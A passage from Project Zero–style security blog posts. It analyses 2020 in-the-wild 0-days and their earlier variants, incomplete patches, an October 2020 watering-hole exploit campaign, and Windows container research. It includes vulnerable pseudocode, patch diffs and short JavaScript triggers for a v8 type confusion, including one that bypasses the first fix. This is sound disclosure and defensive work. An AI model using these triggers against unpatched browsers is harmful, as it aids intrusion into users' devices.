More specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destroyed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder).
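A minimal C++ sketch of the lifetime rule involved, assuming simplified stand-in types (`Cdm`, `MediaCryptoContext`, and `AudioDecoder` here are hypothetical, not Chrome’s classes): whenever the owning `unique_ptr` is replaced, the non-owning raw pointer into the old object has to be refreshed in the same step.

```cpp
#include <cassert>
#include <memory>

// Hypothetical stand-ins for the Chrome types named above.
struct MediaCryptoContext { int id; };

struct Cdm {
    MediaCryptoContext context;  // owned by the CDM
    explicit Cdm(int id) : context{id} {}
};

class AudioDecoder {
public:
    // May be called more than once. Replacing cdm_context_ref_ destroys the
    // old CDM (and its MediaCryptoContext), so the raw pointer is refreshed
    // unconditionally. The buggy shape skipped this assignment when the
    // decoder had already been initialized, leaving it dangling.
    void Initialize(std::unique_ptr<Cdm> cdm) {
        cdm_context_ref_ = std::move(cdm);  // old CDM is destroyed here
        media_crypto_context_ = &cdm_context_ref_->context;
    }

    const MediaCryptoContext* context() const { return media_crypto_context_; }

private:
    std::unique_ptr<Cdm> cdm_context_ref_;
    MediaCryptoContext* media_crypto_context_ = nullptr;  // non-owning
};
```

Calling `Initialize` twice leaves `context()` pointing at the second CDM’s context, by which point the first CDM has already been destroyed.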

The in-the-wild vulnerability was reported in April 2020. Seven months earlier, in September 2019, Man Yue Mo of Semmle reported a very similar vulnerability, CVE-2019-13695. CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_, in MojoAudioDecoderService, after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572; it’s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.

In addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. In that vulnerability, the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice), leading to a use-after-free. When MojoCdmService::Initialize was called twice, there would be two map entries in cdm_services_, but only one would be removed upon destruction, leaving the other dangling. This vulnerability is CVE-2019-5870. Guang Gong used it as part of an Android exploit chain, which he presented at Black Hat USA 2020: “TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices”.
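The double-registration shape can be sketched in the same way. In this hypothetical model (not Chrome’s `MojoCdmService`), each `Initialize()` call would add a table entry while the destructor removes only one. The guard therefore rejects a second initialization instead of leaving a stale entry behind.

```cpp
#include <cassert>
#include <map>

// Hypothetical model of the CVE-2019-5870 pattern: a global table maps ids
// to live services. The destructor removes only the entry for registered_id_.
std::map<int, const void*> g_cdm_services;

class CdmService {
public:
    // Refuses a second registration. Without this guard, the first id would
    // stay in g_cdm_services pointing at a destroyed object.
    bool Initialize(int id) {
        if (registered_id_ != 0) return false;  // assumes 0 is never a valid id
        registered_id_ = id;
        g_cdm_services[id] = this;
        return true;
    }

    ~CdmService() {
        if (registered_id_ != 0) g_cdm_services.erase(registered_id_);
    }

private:
    int registered_id_ = 0;
};
```

With the guard in place, destroying the service always leaves the table empty, because there is only ever one entry to remove.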

While one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This was noted in the issue tracker for CVE-2019-5870 and then brought up again after Man Yue Mo reported CVE-2019-13695.

Windows splwow64 CVE-2020-0986

CVE-2020-0986 is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and CVE-2019-0880, which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D.

From this great write-up from ByteRaptors on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:

void GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)
{
    // ...
    if(*((BYTE*)(firstAddress + 0x4)) == 0x75){
      ULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));
      if(memcpyDestinationAddress != NULL){
        ULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));
        DWORD copySize = *((DWORD*)(firstAddress + 0x28));
        // all three arguments come from the attacker-controlled message
        memcpy(memcpyDestinationAddress, sourceAddress, copySize);
      }
    }
    // ...
}

The equivalent pseudocode for CVE-2020-0986 is below. The message type changed (0x75 to 0x6D), as did the offsets of the controlled memcpy arguments; this path also caps the copy size at 0x1FFFE.

void GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)
{
    // ...
    if(*((BYTE*)(msgSend + 0x4)) == 0x6D){
      // ...
      ULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));
      if(srcAddress != NULL){
        DWORD copySize = *((DWORD*)(msgSend + 0x40));
        if(copySize <= 0x1FFFE) {
          ULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));
          // source, destination, and size all come from the message
          memcpy(destAddress, srcAddress, copySize);
        }
      }
    }
    // ...
}

In addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the “Exploited 0-days not properly fixed” section below.

Freetype CVE-2020-15999

In October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, CVE-2020-15999. The vulnerability is a heap buffer overflow in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.
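The size mismatch is easy to reproduce in isolation. This sketch uses a simplified model rather than FreeType’s actual code. It computes the allocation from the 16-bit truncated dimensions and the write size from the original 32-bit header values, assuming 4 bytes per BGRA pixel. `BitmapSizes` is a hypothetical helper.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Sketch of the CVE-2020-15999 mismatch (simplified, not FreeType's code):
// the allocation uses dimensions truncated to 16 bits, while the PNG
// decoder writes rows using the original 32-bit header values.
struct SizePair {
    std::size_t allocated;  // bytes reserved for the bitmap
    std::size_t written;    // bytes the decoder will write into it
};

SizePair BitmapSizes(std::uint32_t imgWidth, std::uint32_t imgHeight) {
    std::uint16_t width  = static_cast<std::uint16_t>(imgWidth);   // truncated
    std::uint16_t height = static_cast<std::uint16_t>(imgHeight);  // truncated
    std::size_t pitch = static_cast<std::size_t>(width) * 4;       // BGRA: 4 bytes/pixel
    SizePair s;
    s.allocated = static_cast<std::size_t>(height) * pitch;
    s.written   = static_cast<std::size_t>(imgHeight) * imgWidth * 4;
    return s;
}
```

For a header width of 0x10001 and a height of 1, the truncated width is 1, so 4 bytes are allocated while 262,148 bytes are written.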

In November 2014, Project Zero team member Mateusz Jurczyk reported CVE-2014-9665 to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small.
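For comparison, the 2014 bug overflowed the multiplication itself. The sketch below models `size = map->rows * map->pitch` in 32-bit unsigned arithmetic. The field widths are an assumption, and unsigned types keep the wraparound well-defined in this sketch. It also applies the 0x7FFF limit from the 2014 fix, which keeps rows * width * 4 below 2^32. The helper names are hypothetical.

```cpp
#include <cassert>
#include <cstdint>

// Models `size = map->rows * map->pitch` in 32-bit unsigned arithmetic,
// where pitch = width * 4. Unsigned wraparound is well-defined here.
std::uint32_t WrappedSize(std::uint32_t rows, std::uint32_t width) {
    std::uint32_t pitch = width * 4;
    return rows * pitch;
}

// The check added for CVE-2014-9665: reject dimensions above 0x7FFF before
// multiplying, so rows * width * 4 cannot exceed 0xFFFC0004.
bool DimensionsAcceptable(std::uint32_t rows, std::uint32_t width) {
    return rows <= 0x7FFF && width <= 0x7FFF;
}
```

With rows = 0x10000 and width = 0x4000, the pitch is 0x10000 and the 32-bit product wraps to 0. At the 0x7FFF limit, the largest product is 0xFFFC0004, which still fits.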

To patch CVE-2014-9665, Freetype added a check on the rows and width prior to calculating the size, as shown below.

if ( populate_map_and_metrics )
{
      FT_Long  size;
      metrics->width  = (FT_Int)imgWidth;
      metrics->height = (FT_Int)imgHeight;
      map->width      = metrics->width;
      map->rows       = metrics->height;
      map->pixel_mode = FT_PIXEL_MODE_BGRA;
      map->pitch      = map->width * 4;
      map->num_grays  = 256;
+      /* reject too large bitmaps similarly to the rasterizer */
+      if ( map->rows > 0x7FFF || map->width > 0x7FFF )
+      {
+        error = FT_THROW( Array_Too_Large );
+        goto DestroyExit;
+      }
      size = map->rows * map->pitch; /* <- overflow size */
      error = ft_glyphslot_alloc_bitmap( slot, size );
      if ( error )
        goto DestroyExit;
}
To patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved earlier in the `Load_SBit_Png` function and changed to test `imgHeight` and `imgWidth`, the width and height values from the PNG header.

     if ( populate_map_and_metrics )
     {
+      /* reject too large bitmaps similarly to the rasterizer */
+      if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )
+      {
+        error = FT_THROW( Array_Too_Large );
+        goto DestroyExit;
+      }

       metrics->width  = (FT_UShort)imgWidth;
       metrics->height = (FT_UShort)imgHeight;
       map->width      = metrics->width;
       map->rows       = metrics->height;
       map->pixel_mode = FT_PIXEL_MODE_BGRA;
       map->pitch      = map->width * 4;
       map->num_grays  = 256;
-      /* reject too large bitmaps similarly to the rasterizer */
-      if ( map->rows > 0x7FFF || map->width > 0x7FFF )
-      {
-        error = FT_THROW( Array_Too_Large );
-        goto DestroyExit;
-      }

To summarize:

  • CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.
  • CVE-2020-15999 caused a buffer overflow by truncating imgWidth and imgHeight when storing them in metrics->width and metrics->height, which are then used to calculate the size field, making the size too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignment to an unsigned short. Bounds checking the height and width from the PNG header early would have prevented both ways of triggering this buffer overflow.
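Here is a sketch of that root-cause check, using the same simplified model as above rather than FreeType’s real code: validate the 32-bit header values first, then narrow. `CheckedBitmapSize` is a hypothetical helper. It rejects both a width that would be truncated and dimensions whose product would overflow.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>

// Validates the PNG header values before any narrowing (simplified, not
// FreeType's code). Returns the buffer size to allocate, or std::nullopt
// if the dimensions must be rejected.
std::optional<std::size_t> CheckedBitmapSize(std::uint32_t imgWidth,
                                             std::uint32_t imgHeight) {
    // Checking the 32-bit header values first blocks both the truncation
    // path (CVE-2020-15999) and the multiplication overflow (CVE-2014-9665).
    if (imgWidth > 0x7FFF || imgHeight > 0x7FFF) return std::nullopt;
    std::uint16_t width  = static_cast<std::uint16_t>(imgWidth);   // now lossless
    std::uint16_t height = static_cast<std::uint16_t>(imgHeight);  // now lossless
    return static_cast<std::size_t>(height) * width * 4;           // BGRA: 4 bytes/pixel
}
```

Because the narrowing only happens after the range check, the allocation size and the number of bytes later written are always computed from the same values.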

Apple Safari CVE-2020-27930

This vulnerability is slightly different from the rest in that, while it’s still a variant, it’s not clear that by current disclosure norms one would necessarily have expected Apple to pick up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However, when a vulnerability is reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it is also present in the others.

CVE-2020-27930 was used in an exploit chain for iOS. The vulnerability it is a variant of, CVE-2015-0993, was reported to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not correctly validate or handle negative values of n, allowing the font to arbitrarily read and write on the native interpreter stack.

CVE-2020-27930, the vulnerability exploited in-the-wild in 2020, is very similar. This time, the vulnerability is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. Like the vulnerability reported in November 2014, callothersubr expects n arguments from the stack, and the function did not correctly validate or handle negative values of n, leading to the same outcome: arbitrary stack read/write.
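Both bugs come down to trusting an operand count read from the font itself. A hypothetical operand stack (not Apple’s or Microsoft’s interpreter) that validates `n` before popping might look like the following. The `n < 0` test is the one that, per the descriptions above, both implementations were missing.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Hypothetical charstring operand stack (not Apple's or Microsoft's code).
// Operators such as blend or callothersubr take an argument count `n`
// from the font, so `n` is attacker-controlled.
class OperandStack {
public:
    void Push(int v) { values_.push_back(v); }

    // Removes the top `n` operands, or returns false if `n` is negative or
    // larger than the current depth. In an implementation that does
    // `top -= n` on a raw stack pointer, a negative n moves `top` above the
    // live operands instead of below them.
    bool PopArgs(int n) {
        if (n < 0 || static_cast<std::size_t>(n) > values_.size()) return false;
        values_.resize(values_.size() - static_cast<std::size_t>(n));
        return true;
    }

    std::size_t depth() const { return values_.size(); }

private:
    std::vector<int> values_;
};
```

Using a bounds-checked container here is a design choice for the sketch; a real interpreter with a fixed-size array needs the same two comparisons before adjusting its stack pointer.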

Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help attackers discover this vulnerability in Apple’s fork.

Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.


Vulnerability that was exploited in-the-wild | 2nd patch
Internet Explorer CVE-2020-0674 | CVE-2020-0968
Google Chrome CVE-2019-13764* |
Microsoft Windows CVE-2020-0986 |

* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild

Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. Even after the patch for the most recent of them, CVE-2020-0674, which was exploited in January 2020, the variants still weren’t comprehensively fixed: Microsoft patched CVE-2020-0968 in April 2020. We show its trigger in the section above.

Google Chrome CVE-2019-13764

CVE-2019-13764 in Chrome is an interesting case. When it was patched in November 2019, it was not known to be exploited in-the-wild. Instead, it was reported by security researchers Soyeon Park and Wen Xu. Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “Chrome Infinity Bug”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 JavaScript engine. The issue is in the function that computes the type of induction variables: variables that are increased or decreased by a fixed amount in each iteration of a loop, such as the counter of a for loop. The algorithm only works on v8’s integer type, though. The integer type in v8 includes two special values, +Infinity and -Infinity, while -0 and NaN do not belong to it. Another interesting aspect of v8’s integer type is that it is not closed under addition, meaning that adding two integers doesn’t always result in an integer. For example, +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13764. Note that this line will not show any observable crash effects, and the road to making this vulnerability exploitable is quite long; check out this blog post if you’re interested!

for (var i = -Infinity; i < 0; i += Infinity) { }
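The runtime arithmetic behind this trigger can be checked with ordinary IEEE 754 doubles, which is what JavaScript numbers are. This C++ sketch only mirrors the values the loop variable takes; it does not model v8’s typer, and the helper names are hypothetical.

```cpp
#include <cassert>
#include <cmath>
#include <limits>

// IEEE 754 doubles, as used for JavaScript numbers: the integers plus
// +Infinity and -Infinity are not closed under addition.
bool SumIsNaN(double a, double b) { return std::isnan(a + b); }

// Mirrors the header of the one-line trigger,
//   for (var i = -Infinity; i < 0; i += Infinity) { }
// and reports whether the loop variable becomes NaN within max_iters steps.
bool LoopVariableBecomesNaN(double start, double step, int max_iters) {
    double i = start;
    for (int k = 0; k < max_iters && i < 0; ++k) {
        i += step;
        if (std::isnan(i)) return true;
    }
    return false;
}
```

`LoopVariableBecomesNaN(-inf, +inf, 10)` returns true after a single step, producing exactly the value that the typer had ruled out for an integer-typed induction variable.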

The patch that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that rendered it insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore, the following trigger would still work even after the patch was applied.

var increment = -Infinity;
var k = 0;
// The initial loop value is 0 and the increment is -Infinity.
// This is permissible because 0 + -Infinity = -Infinity, an integer.
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    // Once the loop variable equals -Infinity (after one iteration),
    // the increment is changed to +Infinity. -Infinity + +Infinity = NaN
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}

To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. This incomplete fix was reported to Chrome in February 2020. The second patch was more conservative: it bailed out as soon as the typer detected that the increment could be +Infinity or -Infinity.
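A simplified model of the two patches follows (hypothetical helpers, not v8’s code). The first check only inspects initial + increment, which the second trigger passes because 0 + -Infinity = -Infinity, yet replaying that trigger still reaches NaN on its second iteration. The second, more conservative check rejects any increment whose type may include an infinity; here a list of possible increment values stands in for v8’s computed type.

```cpp
#include <cassert>
#include <cmath>
#include <limits>
#include <vector>

// First patch (simplified): assumes NaN can only appear if
// initial + increment is NaN.
bool FirstPatchAllows(double initial, double increment) {
    return !std::isnan(initial + increment);
}

// Second patch (simplified): gives up as soon as the increment may be
// +/-Infinity. `possible_increments` stands in for the increment's type.
bool SecondPatchAllows(const std::vector<double>& possible_increments) {
    for (double inc : possible_increments)
        if (std::isinf(inc)) return false;
    return true;
}

// Replays the second trigger: the increment starts at -Infinity and is
// switched to +Infinity inside the loop body once i == -Infinity.
bool SecondTriggerReachesNaN() {
    const double inf = std::numeric_limits<double>::infinity();
    double increment = -inf;
    double i = 0;
    for (int k = 0; k <= 10 && i < 1; ++k) {
        if (i == -inf) increment = inf;  // loop body runs before the update
        i += increment;                  // the `i += increment` update
        if (std::isnan(i)) return true;
    }
    return false;
}
```

The gap in the first check is that it evaluates the increment once, at loop entry, while the trigger mutates it inside the body; the second check sidesteps that by refusing to reason about infinite increments at all.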

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”. Again, check out Sergei’s blog post if you’re interested in more details.

This is an example where the exploit was found after the bug had initially been reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just for vulnerabilities known to be exploited in-the-wild. The security industry knows there is a gap in our ability to detect 0-days exploited in-the-wild. We don’t find all exploited 0-days, and we certainly don’t find them all in a timely manner.

Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After Kaspersky reported that CVE-2020-0986 was actively exploited as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only disclosed as exploited in-the-wild in August 2020.

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message with offsets. This didn’t fix the root cause of the vulnerability; it just changed how an attacker would trigger it. This issue was reported to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations only read from and copy into the buffer of the message.
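Here is a sketch of the kind of check that closes this class of bug, using a hypothetical helper rather than Microsoft’s code. Offsets alone are not enough: both the source and destination ranges must be shown to lie inside the message buffer before copying, and the comparisons are written to avoid integer overflow on attacker-chosen values.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical helper (not Microsoft's code): source and destination are
// offsets taken from the message, and the copy is allowed only if both
// ranges lie entirely inside the message buffer.
bool CopyWithinMessage(std::uint8_t* msg, std::size_t msg_len,
                       std::size_t src_off, std::size_t dst_off,
                       std::size_t size) {
    // Comparisons are written as subtractions so that huge attacker-chosen
    // offsets cannot wrap around and pass the check.
    if (size > msg_len) return false;
    if (src_off > msg_len - size) return false;
    if (dst_off > msg_len - size) return false;
    std::memmove(msg + dst_off, msg + src_off, size);  // ranges may overlap
    return true;
}
```

Comparing against `msg_len - size` instead of computing `src_off + size` matters here: with an offset near `SIZE_MAX`, the addition would wrap to a small number and slip past a naive check.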

Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. 

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We also hope to expand our variant analysis work to other vulnerabilities, and we hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: my talk at BluehatIL 2020 and Ki Chan Ahn’s talk at OffensiveCon 2020.)

In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

In-the-Wild Series: October 2020 0-day discovery

Posted by Maddie Stone, Project Zero

In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via "watering hole" attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices. These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.

In this post we are summarizing the exploit chains we discovered in October 2020. We have already published the details of the seven 0-day vulnerabilities exploited in our root cause analysis (RCA) posts. This post aims to provide the context around these exploits.

What happened

In October 2020, we discovered that the actor from the February 2020 campaign came back with the next iteration of their campaign: a couple dozen websites redirecting to an exploit server. Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. 

In our testing, both of the exploit servers existed on all of the discovered domains. A summary of the two exploit servers is below:

Exploit server #1:

  • Initially responded to only iOS and Windows user-agents
  • Remained up and active for over a week from when we first started pulling exploits
  • Replaced the Chrome renderer RCE with a new v8 0-day (CVE-2020-16009) after the initial one (CVE-2020-15999) was patched
  • Briefly responded to Android user-agents after exploit server #2 went down (though we were only able to get the new Chrome renderer RCE)

Exploit server #2:

  • Responded to Android user-agents
  • Remained up and active for ~36 hours from when we first started pulling exploits
  • In our experience, responded to a much smaller block of IP addresses than exploit server #1

The diagram above shows the flow of a device connecting to one of the affected websites. The device is directed to either exploit server #1 or exploit server #2. The following exploits are then delivered based on the device and browser.

Exploit Server | Platform | Browser | Renderer RCE | Sandbox Escape | Local Privilege Escalation
#1 | iOS | Safari | Stack R/W via Type 1 Fonts (CVE-2020-27930) | Not needed | Info leak via mach message trailers (CVE-2020-27950); Type confusion with turnstiles (CVE-2020-27932)
#1 | Windows | Chrome | Freetype heap buffer overflow (CVE-2020-15999) | Not needed | cng.sys heap buffer overflow (CVE-2020-17087)
#1** | Android | Chrome | V8 type confusion in TurboFan (CVE-2020-16009) | |
#2 | Android | Chrome | Freetype heap buffer overflow (CVE-2020-15999) | Chrome for Android heap buffer overflow (CVE-2020-16010) |
#2 | Android | Samsung Browser | Freetype heap buffer overflow (CVE-2020-15999) | Chromium n-day |

** Note: This was only delivered after #2 went down and CVE-2020-15999 was patched.


All of the platforms employed obfuscation and anti-analysis checks, but each platform's obfuscation was different. For example, iOS is the only platform whose exploits were encrypted with ephemeral keys, meaning that the exploits couldn't be recovered from the packet dump alone, instead requiring an active MITM on our side to rewrite the exploit on-the-fly.

These operational exploits also lead us to believe that, while the entities behind exploit servers #1 and #2 are different, they are likely working in a coordinated fashion. Both exploit servers used the Chrome Freetype RCE (CVE-2020-15999) as the renderer exploit for Windows (exploit server #1) and Android (exploit server #2), but the code that surrounded these exploits was quite different. The fact that the two servers went down at different times also leads us to believe that there were two distinct operators.

The exploits

In total, we collected:

  • 1 full chain targeting fully patched Windows 10 using Google Chrome
  • 2 partial chains targeting 2 different fully patched Android devices running Android 10 using Google Chrome and Samsung Browser, and
  • RCE exploits for iOS 11-13 and privilege escalation exploits for iOS 13 (though the vulnerabilities were present up to iOS 14.1)

*Note: iOS, Android, and Windows were the only devices we tested while the servers were still active. The lack of other exploit chains does not mean that those chains did not exist.

The seven 0-days exploited by this attacker are listed below. We’ve provided the technical details of each of the vulnerabilities and their exploits in the root cause analyses.

We were not able to collect any Android local privilege escalations prior to exploit server #2 being taken down. Exploit server #1 stayed up longer, and we were able to retrieve the privilege escalation exploits for iOS.

The vulnerabilities cover a fairly broad spectrum of issues, from a modern JIT vulnerability to a large cache of font bugs. Overall, each of the exploits showed an expert understanding of exploit development and of the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero. Figuring out how to trigger the iOS kernel privilege escalation vulnerability would have been non-trivial. The obfuscation methods were varied and time-consuming to figure out.


Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year. We are so thankful to all of the vendors and defensive response teams who worked their own long days to analyze our reports and get patches released and applied.

Who Contains the Containers?

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

Diagram of a server silo. Shows an application interacting with the registry, object manager and network and how being in the silo redirects that access to another location.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

Diagram comparing Windows Server Containers and Hyper-V Isolated Containers. The server container on the left directly accesses the host's kernel. For Hyper-V, the container accesses a virtualized kernel, which dispatches to the hypervisor and then back to the original host kernel. This shows the additional security boundary in place that makes Hyper-V isolated containers more secure.

The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary, bugs in the feature won't result in a security bulletin being issued. Such issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks, about some details of Windows object manager symbolic links. Daniel was doing research into Windows containers and wanted help with a feature which allows symbolic links to be marked as global, which lets them reference objects outside the server silo. I recommend reading Daniel's blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

